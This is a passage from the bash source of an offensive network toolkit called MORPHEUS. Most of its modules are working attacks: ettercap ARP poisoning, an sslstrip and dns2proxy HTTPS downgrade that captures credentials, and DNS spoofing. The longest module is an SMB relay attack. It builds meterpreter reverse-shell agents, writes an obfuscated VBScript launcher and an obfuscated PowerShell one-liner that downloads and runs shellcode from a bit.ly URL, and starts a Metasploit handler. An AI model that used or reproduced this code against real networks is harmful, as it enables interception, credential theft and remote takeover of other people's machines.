        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - devices auth capture" -geometry 90x42 -e "cd $IPATH/bin && ./warn.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/dhcp-discovery.ef -M ARP /// ///
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - devices auth capture" -geometry 90x42 -e "cd $IPATH/bin && ./warn.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/dhcp-discovery.ef -L $IPATH/logs/dhcp-discovery.log -M ARP /// ///
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - devices auth capture" -geometry 90x42 -e "cd $IPATH/bin && ./warn.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/dhcp-discovery.ef -M ARP // //
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS - devices auth capture" -geometry 90x42 -e "cd $IPATH/bin && ./warn.sh" & ettercap -T -Q -i $InT3R -F $IPATH/output/dhcp-discovery.ef -L $IPATH/logs/dhcp-discovery.log -M ARP // //
        fi
      fi

  # check if exist any reports (.log files)
  if [ -e $IPATH/logs/$store.log ] || [ -e $IPATH/logs/$twoop.log ]; then
  Qu=$(zenity --info --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "logfiles stored $IPATH/logs" --width 270) > /dev/null 2>&1
  fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  sleep 2
  mv $IPATH/filters/dhcp-discovery.bak $IPATH/filters/dhcp-discovery.eft > /dev/null 2>&1
  rm $IPATH/output/dhcp-discovery.ef > /dev/null 2>&1
  rm $IPATH/logs/parse > /dev/null 2>&1
  rm $IPATH/logs/triggertwo > /dev/nul 2>&1
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}





# -------------------------------
# BLOCK CRYPTOMINNING CONNECTIONS
# -------------------------------
sh_stage18 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}This filter will act like a firewall reporting and blocking crypto${BlueF}|"
echo -e "${BlueF}    | ${YellowF}minning currency connections inside Local Lan (selected target)   ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}If a connection its found on sellected machine (ip address) then  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}this filter will warn framework users and drops/kill the minning  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}connection (tcp/udp packets) and writtes a logfile in logs folder.${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter RHOST ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
crypto=$(zenity --title="☠ DOMAIN NAME TO FILTER ☠" --text "example: coin-hive.com\nchose the domain name to filter through morpheus." --entry --width 270) > /dev/null 2>&1
fil_one=$(zenity --title="☠ HOST TO FILTER ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1

  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  cp $IPATH/filters/cryptocurrency.eft $IPATH/filters/cryptocurrency.rb > /dev/null 2>&1
  cd $IPATH/filters/
  sed -i "s|CrYpT|$crypto|g" cryptocurrency.eft
  sed -i "s|TaRONE|$fil_one|g" cryptocurrency.eft
  sleep 1

  echo -e ${BlueF}[☠]${white} Edit template${RedF}!${Reset};
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/cryptocurrency.eft"
  sleep 1

    # compiling template.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling template${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/cryptocurrency.eft -o $IPATH/output/cryptocurrency.ef && sleep 3"
    sleep 1
    # port-forward
    # echo -e "1" > /proc/sys/net/ipv4/ip_forward
    cd $IPATH/logs

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/cryptocurrency.ef -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/cryptocurrency.ef -L $IPATH/logs/cryptocurrency -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/cryptocurrency.ef -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/cryptocurrency.ef -L $IPATH/logs/cryptocurrency -M ARP /$rhost/ /$gateway/
        fi
      fi
    

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/cryptocurrency.rb $IPATH/filters/cryptocurrency.eft > /dev/null 2>&1
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2
  rm $IPATH/output/cryptocurrency.ef > /dev/null 2>&1


    if [ -e $IPATH/logs/crypto-currency.log ]; then
      cd $IPATH/logs
        # delete utf-8/non-ancii caracters from logfile
        tr -cd '\11\12\15\40-\176' < crypto-currency.log > final.log
        sed -i "s|www||g" final.log
        sed -i "s|\!||g" final.log
        sed -i "s|\+||g" final.log
        sed -i "s|(||g" final.log
        mv final.log crypto-currency.log > /dev/null 2>&1
        rm final.log > /dev/null 2>&1
    fi
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}





# ----------------------------------------------------
# REDIRECT TARGET TRAFIC TO GOOGLE EASTER EGGS (prank)
# ----------------------------------------------------
sh_stage19 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}      This module will redirect target browsing surfing under     ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}     mitm attacks to google easter egg webpages (google prank)    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}            'All [.com ] domains will be redirected'              ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1

#
# chose the easter egg to use under mitm+dns_spoof
#
EGG=$(zenity --list --title "☠ GOOGLE EASTER EGGS ☠" --text "List of availables google easter eggs:" --radiolist --column "Pick" --column "Option" TRUE "Do a Barrel roll" FALSE "zerg rush" FALSE "blink html" FALSE "google 180" --width 320 --height 230) > /dev/null 2>&1
#
# parse easter egg search string
#
if [ "$EGG" = "Do a Barrel roll" ]; then
  parsed="Do+a+Barrel+roll"
elif [ "$EGG" = "zerg rush" ]; then
  parsed="zerg+rush"
elif [ "$EGG" = "blink html" ]; then
  parsed="Blink+HTML"
else
  parsed="<head><style>body{-webkit-transform:rotate(-180deg) !important;-ms-transform:rotate(-180deg) !important;-moz-transform:rotate(-180deg) !important;}</style>"
fi



  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sleep 1
  # backup all files needed.
  cd $IPATH/bin
  cp $IPATH/bin/etter.dns etter.rb > /dev/null 2>&1 # backup
  cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
  cp $IPATH/filters/EasterEgg.eft $IPATH/filters/EasterEgg.rb > /dev/null 2>&1 # backup
  cp $IPATH/bin/phishing/EasterEgg.html $IPATH/bin/phishing/EasterEgg.bak > /dev/null 2>&1 # backup
  # use SED bash command to config our etter.dns
  sed -i "s|TaRgEt|$IP|g" etter.dns # NO dev/null to report file not existence :D
  sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
  cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
  echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};

    # using SED bash command to config redirect.eft
    if [ "$EGG" = "google 180" ]; then
      sed -i "s|IpAdR|$parsed|g" $IPATH/filters/EasterEgg.eft > /dev/null 2>&1
    else
      sed -i "s|IpAdR|https://www.google.im/search?q=$parsed&gws_rd=ssl|g" $IPATH/filters/EasterEgg.eft > /dev/null 2>&1
    fi

  echo -e ${BlueF}[☠]${white} google easter egg:${GreenF}$parsed ${Reset};
  # copy files needed to apache2 webroot...
  cd phishing/
  if [ "$EGG" = "google 180" ]; then
    cp $IPATH/bin/phishing/Google_prank_180/googlelogo_color_272x92dp.png $ApachE/googlelogo_color_272x92dp.png > /dev/null 2>&1
    cp $IPATH/bin/phishing/Google_prank_180/Google.html $ApachE/index.html > /dev/null 2>&1
  else
    sed -i "s|RePlAcE|$parsed|g" EasterEgg.html > /dev/null 2>&1
    cp $IPATH/bin/phishing/EasterEgg.html $ApachE/index.html > /dev/null 2>&1
  fi
cd $IPATH
sleep 1

# compiling packet_drop.eft to be used in ettercap
xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/EasterEgg.eft"
echo -e ${BlueF}[☠]${white} Compiling EasterEgg.eft${RedF}!${Reset};
sleep 1
xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/EasterEgg.eft -o $IPATH/output/EasterEgg.ef && sleep 3"
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      cd $IPATH/logs
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/EasterEgg_prank -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -q -i $InT3R -P dns_spoof -L $IPATH/logs/EasterEgg_prank -M ARP /$rhost/ /$gateway/
        fi
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stoping apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
  rm $IPATH/output/EasterEgg.ef > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv $IPATH/filters/EasterEgg.rb $IPATH/filters/EasterEgg.eft > /dev/null 2>&1 # backup
  mv $IPATH/bin/phishing/EasterEgg.bak $IPATH/bin/phishing/EasterEgg.html > /dev/null 2>&1 # backup
  rm $ApachE/index.html > /dev/null 2>&1
  rm $ApachE/googlelogo_color_272x92dp.png > /dev/null 2>&1
  cd $IPATH
  sleep 2

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}




# ----------------------------------------------------------------
# CAPTURE HTTPS CREDENTIALS (dns2proxy|sslstrip|ettercap|iptables)
# REF: https://www.guiadoti.com/2017/09/sslstrip-2-0-hsts-bypass/
# VID: http://www.youtube.com/watch?v=uGBjxfizy48
# ----------------------------------------------------------------
sh_stage20 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}This module uses dns2proxy + sslstrip + ettercap + iptables to be ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} able to capture https (ssl) credentials over mitm + dns_spoofing ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}         ( by downgrade packets from HTTPS to HTTP )              ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then
echo -e ${BlueF}[☠]${white} checking module dependencies ..${Reset};
sleep 2


#
# check dependencies (backend appl)
#
c=`dpkg -l python-twisted-web`
if [ "$?" -eq "0" ]; then
  echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} python-twisted-web${RedF}:${GreenF} found .. ${Reset};
  sleep 1
else
  Fail="YES"
  echo -e ${BlueF}[${RedF}x${BlueF}]${white} python-twisted-web${RedF}:${GreenF} not found .. ${Reset};
  sleep 1
  echo -e ""
  apt-get install python-twisted-web
  echo -e ""
fi


t=`which sslstrip`
if [ "$?" -eq "0" ]; then
  echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} sslstrip-0.9${RedF}:${GreenF} found .. ${Reset};
  sleep 1
  stripath=`locate sslstrip.py | grep "/usr/share/sslstrip"`
else
  Fail="YES"
  echo -e ${BlueF}[${RedF}x${BlueF}]${white} sslstrip-0.9${RedF}:${RedF} not found .. ${Reset};
  sleep 1
  cd $IPATH/bin/Utils/sslstrip-0.9
  echo -e ""
  python setup.py build & python setup.py install
  echo -e ""
  stripath=`locate sslstrip.py | grep "/usr/share/sslstrip"`
  cd $IPATH/
fi


if [ -e "$IPATH/bin/Utils/dns2proxy/dns2proxy.py" ]; then
  echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} dns2proxy${RedF}:${GreenF} found .. ${Reset};
  sleep 1
  dnsproxypath="$IPATH/bin/Utils/dns2proxy/dns2proxy.py"
else
  Fail="YES"
  echo -e ${BlueF}[${RedF}x${BlueF}]${white} dns2proxy${RedF}:${RedF} not found .. ${Reset};
  sleep 1
fi


c=`pip install dnspython`
if [ "$?" -eq "0" ]; then
  echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} dnspython${RedF}:${GreenF} found .. ${Reset};
  sleep 1
else
  Fail="YES"
  echo -e ${BlueF}[${RedF}x${BlueF}]${white} dnspython${RedF}:${GreenF} not found .. ${Reset};
  sleep 1
  echo -e ""
  pip install dnspython
  echo -e ""
fi



#
# Restart tool after installing missing dependencies
#
if [ "$Fail" = "YES" ]; then
  echo -e ${BlueF}[${RedF}x${BlueF}]${white} restarting morpheus to finish installs ..${Reset};
  sleep 3
  exit
fi



#
# start of module funtions ..
#
cd $IPATH/output
if [ -e $stripath ]; then
  :
else
  echo -e ${BlueF}[${RedF}x${BlueF}]${white} SSLSTRIP installation NOT found ..${Reset};
  sleep 2
  exit
fi
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1

  #
  # ip fowarding in iptables
  #
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
  sleep 1
  echo -e "1" > /proc/sys/net/ipv4/ip_forward

  #
  # IPTABLES SETTINGS ..
  #
  iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 
  iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53

  # ARP poison ..
  cd $IPATH/bin/Utils/dns2proxy
  if [ "$IpV" = "ACTIVE" ]; then
    echo -e ${GreenF}[☠]${white} Using IPv6 settings ${Reset};
    echo -e ${GreenF}[☠]${white} press [q] to quit arp poison ..${Reset};
    sleep 2
    xterm -T "MORPHEUS - dns2proxy" -geometry 90x26 -e "python $dnsproxypath" & python $stripath -l 10000 -a -w $IPATH/output/log.txt & ettercap -T -q -i $InT3R -M ARP /$rhost// /$gateway//
  else
    echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
    echo -e ${GreenF}[☠]${white} press [q] to quit arp poison ..${Reset};
    sleep 2
    xterm -T "MORPHEUS - dns2proxy" -geometry 90x26 -e "python $dnsproxypath" & python $stripath -l 10000 -a -w $IPATH/output/log.txt & ettercap -T -q -i $InT3R -M ARP /$rhost/ /$gateway/
  fi


  # clean all settings
  sleep 2
  echo -e ${BlueF}[☠]${white} cleaning settings .. ${Reset};
  sleep 2
  killall sslstrip > /dev/null 2>&1
  killall python > /dev/null 2>&1
  iptables --flush
  iptables --table nat --flush
  iptables --delete-chain
  iptables --table nat --delete-chain
  # reset ip-forward
  echo -e "0" > /proc/sys/net/ipv4/ip_forward
  echo -e ${BlueF}[☠]${white} editing sslstrip session log File ${Reset};
  sleep 4
  xterm -T "Sslstrip session log" -e "nano $IPATH/output/log.txt"
  sleep 2


else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}







# ----------------------------------------------------
# C&C SMBrelay attack (c&c smb exploit)
# ----------------------------------------------------
sh_stage21 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}In morpheus SMB Relay lateral movement attack we will need 2 pcs  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}(attacker,target) the attacker machine will wait for any smb auth ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}attempts in local lan and uses the hashs captured to authenticate ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}itself on target machine to upload and execute remote our agent.  ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2



# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

#
# config module settings ..
#
echo -e ${BlueF}[☠]${white} Enter module settings!${Reset};
sleep 2
lhost=$(zenity --title="☠ Enter  payload LHOST ☠" --text "example: $IP" --entry --width 270) > /dev/null 2>&1
lport=$(zenity --title="☠ Enter  payload LPORT ☠" --text "example: 666" --entry --width 270) > /dev/null 2>&1


# select RHOST ..
scnt=$(zenity --list --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text "\nChose option:" --radiolist --column "Pick" --column "Option" TRUE "Scan LAN for active shares" FALSE "Input target ip address [RHOST]" --width 320 --height 200) > /dev/null 2>&1

if [ "$scnt" = "Scan LAN for active shares" ];then
  dtr=`date | awk {'print $4'}`
  ip_range=`ip route | grep "kernel" | awk {'print $1'}`
  nmap -sS -Pn -T4 -f --script smb-enum-shares.nse,smb-os-discovery.nse -p 445 $IP_RANGE -oN $IPATH/logs/SMBrelay.report | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="[ $dtr ] Scanning local lan for shares" --percentage=0 --auto-close --width 300 > /dev/null 2>&1
  cat $IPATH/logs/SMBrelay.report | grep -v "RTTVAR" | zenity --title "☠ LOCAL LAN REPORT ☠" --text-info --width 570 --height 470 > /dev/null 2>&1
  rhost=$(zenity --title="☠ Enter  target RHOST ☠" --text "example: 192.168.1.100" --entry --width 270) > /dev/null 2>&1
  shr=$(zenity --title="☠ Sellect $rhost share ☠" --text "example: ADMIN$ or C$ or IPC$" --entry --width 270) > /dev/null 2>&1
else
  rhost=$(zenity --title="☠ Enter  target RHOST ☠" --text "example: 192.168.1.100" --entry --width 270) > /dev/null 2>&1
  shr=$(zenity --title="☠ Sellect $rhost share ☠" --text "example: ADMIN$ or C$ or IPC$" --entry --width 270) > /dev/null 2>&1
fi


  #
  # start metasploit services
  #
  echo -e ${BlueF}[☠]${white} Start metasploit services ..${Reset};
  service postgresql start > /dev/null 2>&1
    if [ "$RbUdB" = "YES" ]; then
      echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Rebuild msfdb [database] ..${Reset};
      msfdb reinit > /dev/null 2>&1
    fi


  #
  # check dependencies ..
  #
  echo -e ${BlueF}[☠]${white} Check module dependencies ..${Reset};
  sleep 2
  if [ -d /opt/impacket ]; then
    echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Python impacket libs found ..${Reset};
    sleep 2
  else
    echo -e ${BlueF}[${RedF}x${BlueF}]${white} Python impacket libs not found ..${Reset};
    sleep 2
    echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Installing impacket python libs ..${Reset};
    echo -e ""
    cd /opt
    git clone https://github.com/CoreSecurity/impacket.git
    cd impacket 
    pip install ldap3
    python setup.py install
    echo -e ""
  fi


#
# build payload (.exe|.vbs) and trigger.bat
#
form=$(zenity --list --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text "\nAvailable agents:" --radiolist --column "Pick" --column "Option" TRUE "Build binary.exe agent" FALSE "Build VBScript agent" FALSE "Build powershell agent" --width 320 --height 230) > /dev/null 2>&1
if [ "$form" = "Build binary.exe agent" ]; then
  echo -e ${BlueF}[☠]${white} Building winhttps agent.exe ..${Reset};
  sleep 2
  xterm -T "MORPHEUS - BUILD AGENT.exe" -geometry 110x23 -e "msfvenom -p windows/meterpreter/reverse_winhttps LHOST=$lhost LPORT=$lport HandlerSSLCert=$IPATH/bin/www.gmail.com.pem StagerVerifySSLCert=true -f exe -n 20 -o $IPATH/output/agent.exe"
elif [ "$form" = "Build VBScript agent" ]; then
  echo -e ${BlueF}[☠]${white} Building winhttps agent.vbs ..${Reset};
  sleep 2
  xterm -T "MORPHEUS - BUILD AGENT.vbs" -geometry 110x23 -e "msfvenom -p windows/meterpreter/reverse_winhttps LHOST=$lhost LPORT=$lport HandlerSSLCert=$IPATH/bin/www.gmail.com.pem StagerVerifySSLCert=true -f psh-cmd -n 20 -o $IPATH/output/chars.raw"
  disp=`cat $IPATH/output/chars.raw | awk {'print $12'}`
  echo -e "dIm f0wBiQ,U1kJi0,dIb0fQ:U1kJi0=\"/wINe\"+\"NPoW\"&\"eR1no\"+\"PSh\"&\"ElLn\"+\"oNI\":f0wBiQ=mid(U1kJi0,7,5)&MiD(U1kJi0,16,5)&\" \"&mId(U1kJi0,1,4)&\" 1 \"&mId(U1kJi0,1,1)&MiD(U1kJi0,13,3)&\" \"&mId(U1kJi0,1,1)&mId(U1kJi0,21,4)&\" \"&mId(U1kJi0,1,1)&mId(U1kJi0,5,2)&\" $disp\":sEt dIb0fQ=cReAtEObJeCt(\"\"+\"W\"&\"sCr\"+\"Ip\"&\"t.Sh\"+\"El\"&\"L\"):dIb0fQ.rUn f0wBiQ" > $IPATH/output/agent.vbs
else
  echo -e ${BlueF}[☠]${white} Building http agent.ps1 ..${Reset};
  sleep 2
oneliner="PoWeRsHelL /W\`in 1 /n\`oP /Com\`mand \"0i=(\"{reve'+'rse_ht'+'tp}{wind'+'ows/}{met'+'erpr'+'eter/}\" -f'1','2','0');I\`EX ('({0}w-Obj\`ect {0}t.WebC\`lient).{1}Str\`ing(\"{2}bit'+'.ly/14b'+'ZZ'+'0c\")' -f'Ne','Down'+'load','htt'+'p://');In\`voke-Sh\`ell\`cod\`e –P\`ay\`loa\`d \$0i –Lh\`ost $lhost –Lp\`ort $lport –F\`or\`ce\""

# default ..
# oneliner="powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c');Invoke-Shellcode –Payload windows/meterpreter/reverse_http –Lhost $lhost –Lport $lport –Force\""
fi



# Simulate the scanner attempting to connect to the share ..
# STRING: dir \\192.168.1.253\ADMIN$
echo -e ${BlueF}[☠]${white} Building trigger.bat ..${Reset};
sleep 2
cd $IPATH/bin
sed "s|RePlAcE|$rhost|g" trigger.bat > done.bat
sed -i "s|ShAr3|$shr|g" done.bat
mv done.bat $IPATH/output/trigger.bat


#
# final notes ..
#
if [ "$form" = "Build binary.exe agent" ]; then
zenity --title "☠ FINAL NOTES ☠" --text "Morpheus its now ready to use the SmbRelay lateral\nmovement attack as soon we click the 'yes' button.\n\nIf we wish to [ manually ] trigger the vulnerability\nthen we are going to need a 3º PC were we are going\nto execute the [ trigger.bat ] file to simulate one smb\nauth attempt on local lan so that morpheus can use\nthat captured credentials to upload/execute our\nagent.exe into target PC [ RHOST ]" --info --width 360 --height 270 > /dev/null 2>&1
elif [ "$form" = "Build VBScript agent" ]; then
zenity --title "☠ FINAL NOTES ☠" --text "Morpheus its now ready to use the SmbRelay lateral\nmovement attack as soon we click the 'yes' button.\n\nIf we wish to [ manually ] trigger the vulnerability\nthen we are going to need a 3º PC were we are going\nto execute the [ trigger.bat ] file to simulate one smb\nauth attempt on local lan so that morpheus can use\nthat captured credentials to upload/execute our\nagent.vbs into target PC [ RHOST ]" --info --width 360 --height 270 > /dev/null 2>&1
else
zenity --title "☠ FINAL NOTES ☠" --text "Morpheus its now ready to use the SmbRelay lateral\nmovement attack as soon we click the 'yes' button.\n\nIf we wish to [ manually ] trigger the vulnerability\nthen we are going to need a 3º PC were we are going\nto execute the [ trigger.bat ] file to simulate one smb\nauth attempt on local lan so that morpheus can use\nthat captured credentials to upload/execute our\nagent.ps1 into target PC [ RHOST ]" --info --width 360 --height 270 > /dev/null 2>&1
fi


#
# smbrelay attack
#
cd $IPATH/bin/Utils
echo -e ${BlueF}[${GreenF}✔${BlueF}]${white} Runing SMBRelay lateral movement ..${Reset};
if [ "$form" = "Build binary.exe agent" ]; then
echo -e ""
python smbrelayx.py -h $rhost -e $IPATH/output/agent.exe & xterm -T "MORPHEUS - MULTI-HANDLER" -geometry 124x26 -e "msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttps; set LHOST $lhost; set LPORT $lport; set HandlerSSLCert $IPATH/bin/www.gmail.com.pem; set StagerVerifySSLCert true; set EnableStageEncoding true; set StageEncoder x86/shikata_ga_nai; set AutoRunScript post/windows/manage/migrate; exploit'" > /dev/null 2>&1
elif [ "$form" = "Build VBScript agent" ]; then
echo -e ""
python smbrelayx.py -h $rhost -e $IPATH/output/agent.vbs & xterm -T "MORPHEUS - MULTI-HANDLER" -geometry 124x26 -e "msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_winhttps; set LHOST $lhost; set LPORT $lport; set HandlerSSLCert $IPATH/bin/www.gmail.com.pem; set StagerVerifySSLCert true; set EnableStageEncoding true; set StageEncoder x86/shikata_ga_nai; set AutoRunScript post/windows/manage/migrate; exploit'" > /dev/null 2>&1
else
echo -e ${BlueF}[☠]${white} Agent:${BlueF} $oneliner ${Reset};
sleep 2
echo -e ""
python smbrelayx.py -h $rhost -c "$oneliner" & xterm -T "MORPHEUS - MULTI-HANDLER" -geometry 124x26 -e "msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_http; set LHOST $lhost; set LPORT $lport; set HandlerSSLCert $IPATH/bin/www.gmail.com.pem; set StagerVerifySSLCert true; set EnableStageEncoding true; set StageEncoder x86/shikata_ga_nai; set AutoRunScript post/windows/manage/migrate; exploit'" > /dev/null 2>&1
fi
echo -e ""


#
# clean
#
echo -e ${BlueF}[☠]${white} cleaning old files .. ${Reset};
sleep 2
service postgresql stop > /dev/null 2>&1
cd $IPATH/output/
killall python > /dev/null 2>&1
rm trigger.bat > /dev/null 2>&1
rm chars.raw > /dev/null 2>&1



#
# abort button pressed ..
#
else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}



# ----------------------------------------
# tcp http headers infomation gather
# ----------------------------------------
sh_stage22 () {

echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}This module capture sellected 'device' tcp http headers requests. ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}to gather information about target system browser settings.       ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
